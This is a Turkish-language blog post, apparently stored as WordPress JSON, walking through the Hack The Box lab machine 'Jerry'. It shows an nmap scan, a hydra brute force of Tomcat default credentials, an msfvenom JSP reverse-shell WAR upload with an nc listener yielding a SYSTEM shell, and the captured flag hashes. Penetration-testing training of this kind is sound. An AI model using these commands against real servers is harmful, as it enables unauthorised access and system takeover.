{"id":1469,"date":"2021-08-03T12:42:22","date_gmt":"2021-08-03T12:42:22","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1469"},"modified":"2021-08-03T12:43:33","modified_gmt":"2021-08-03T12:43:33","slug":"jerry","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/08\/03\/jerry\/","title":{"rendered":"Jerry"},"content":{"rendered":"\n\n\n\n\n
Makine Ad\u0131<\/th>\nSeviye<\/th>\nOS<\/th>\nLogo<\/th>\n<\/tr>\n<\/thead>\n
Jerry<\/a> - HTB<\/td>\nKolay<\/td>\nWindows<\/td>\n\"\"<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

Walkthrough<\/h2>\n

nmap taramas\u0131 ile ba\u015flayal\u0131m.<\/p>\n

\nPORT     STATE SERVICE VERSION\n8080\/tcp open  http    Apache Tomcat\/Coyote JSP engine 1.1\n|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)\n|_http-csrf: Couldn't find any CSRF vulnerabilities.\n|_http-dombased-xss: Couldn't find any DOM based XSS.\n| http-enum: \n|   \/examples\/: Sample scripts\n|   \/manager\/html\/upload: Apache Tomcat (401 Unauthorized)\n|   \/manager\/html: Apache Tomcat (401 Unauthorized)\n|_  \/docs\/: Potentially interesting folder\n|_http-server-header: Apache-Coyote\/1.1\n|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.\n|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)\n<\/code><\/pre>\n
gobuster taramas\u0131nda bir \u015fey \u00e7\u0131kmad\u0131. Daha sonras\u0131nda tomcat i\u00e7in default credential'lar\u0131 denemeye karar verdim. https:\/\/raw.githubusercontent.com\/danielmiessler\/SecLists\/master\/Passwords\/Default-Credentials\/tomcat-betterdefaultpasslist.txt<\/a><\/strong> adresinden user ve passwordleri indirdim python ile k\u00fc\u00e7\u00fck bir kod yaz\u0131p bu wordlisti d\u00fczenledim.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/oscp\/htb\/Jerry]\n\u2514\u2500# cat create.py \ndosya = open("tomcat-betterdefaultpasslist.txt")\nwordlist = dosya.read()\nwordlist = wordlist.split("\\n")\ndosya.close()\n\nusername = []\npassword = []\n\nfor i in wordlist:\n    try:\n        username.append(i.split(":")[0])\n        password.append(i.split(":")[1])\n    except:\n        continue\n\ndosya = open("username","a")\nfor i in username:\n    dosya.write(i+"\\n")\ndosya.close()\n\ndosya = open("password","a")\nfor i in password:\n    dosya.write(i+"\\n")\ndosya.close()<\/code><\/pre>\n
\u015eimdi hydra ile deneyelim.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/oscp\/htb\/Jerry]\n\u2514\u2500# hydra -L username -P password  10.10.10.95 -s 8080 http-get \/host-manager\/html\nHydra v9.1 (c) 2020 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2021-08-03 08:27:41\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 6240 login tries (l:80\/p:78), ~390 tries per task\n[DATA] attacking http-get:\/\/10.10.10.95:8080\/host-manager\/html\n[8080][http-get] host: 10.10.10.95   login: admin   password: admin\n[8080][http-get] host: 10.10.10.95   login: admin   password: admin\n[8080][http-get] host: 10.10.10.95   login: admin   password: admin\n[STATUS] 2627.00 tries\/min, 2627 tries in 00:01h, 3613 to do in 00:02h, 16 active\n[STATUS] 2106.00 tries\/min, 4212 tries in 00:02h, 2028 to do in 00:01h, 16 active\n[8080][http-get] host: 10.10.10.95   login: tomcat   password: s3cret\n[8080][http-get] host: 10.10.10.95   login: tomcat   password: s3cret\n1 of 1 target successfully completed, 5 valid passwords found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2021-08-03 08:30:36\n<\/code><\/pre>\n
\u0130ki adet kullan\u0131c\u0131 tespit ettik. admin admin<\/code>'le girdi\u011fimde yetkilerim ks\u0131t\u0131l\u0131yd\u0131 ancak tomcat scret<\/code> ile girdi\u011fimde dosya y\u00fckleyebildim.<\/p>\n
Hemen bir war dosyas\u0131 olu\u015ftural\u0131m.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/oscp\/htb\/Jerry]\n\u2514\u2500# msfvenom -p java\/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=4444 -f war > shell.war\n\nPayload size: 1086 bytes\nFinal size of war file: 1086 bytes<\/code><\/pre>\n
http:\/\/10.10.10.95:8080\/manager\/html\/list<\/a>
\n<\/strong> dosyasy\u0131 buradan y\u00fckledim ve daha sornas\u0131nde reverse ald\u0131m. http:\/\/10.10.10.95:8080\/shell\/<\/a><\/strong><\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/oscp\/htb\/Jerry]\n\u2514\u2500# nc -lvp 4444  \nlistening on [any] 4444 ...\n10.10.10.95: inverse host lookup failed: Unknown host\nconnect to [10.10.14.15] from (UNKNOWN) [10.10.10.95] 49192\nMicrosoft Windows [Version 6.3.9600]\n(c) 2013 Microsoft Corporation. All rights reserved.\n\nC:\\apache-tomcat-7.0.88>whoami\nwhoami\nnt authority\\system<\/code><\/pre>\n
Flagleri okuyal\u0131m.<\/p>\n
C:\\Users\\Administrator\\Desktop\\flags>dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is FC2B-E489\n\n Directory of C:\\Users\\Administrator\\Desktop\\flags\n\n06\/19\/2018  07:09 AM    <DIR>          .\n06\/19\/2018  07:09 AM    <DIR>          ..\n06\/19\/2018  07:11 AM                88 2 for the price of 1.txt\n               1 File(s)             88 bytes\n               2 Dir(s)  27,576,569,856 bytes free\n\nC:\\Users\\Administrator\\Desktop\\flags>type "2 for the price of 1.txt"\ntype "2 for the price of 1.txt"\nuser.txt\n7004dbcef0f854e0fb401875f26ebd00\n\nroot.txt\n04a8b36e1545a455393d067e772fe90e<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
Makine Ad\u0131 Seviye OS Logo Jerry – HTB Kolay Windows Walkthrough nmap taramas\u0131 ile ba\u015flayal\u0131m. PORT STATE SERVICE VERSION 8080\/tcp open http Apache Tomcat\/Coyote JSP…<\/p>\n
Devam\u0131n\u0131 okuJerry<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[596,498,468],"tags":[597,540],"class_list":["post-1469","post","type-post","status-publish","format-standard","hentry","category-tomcat","category-walkthrough","category-windows","tag-basic-authentication","tag-tomcat","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1469","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1469"}],"version-history":[{"count":2,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1469\/revisions"}],"predecessor-version":[{"id":1471,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1469\/revisions\/1471"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1469"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1469"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1469"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}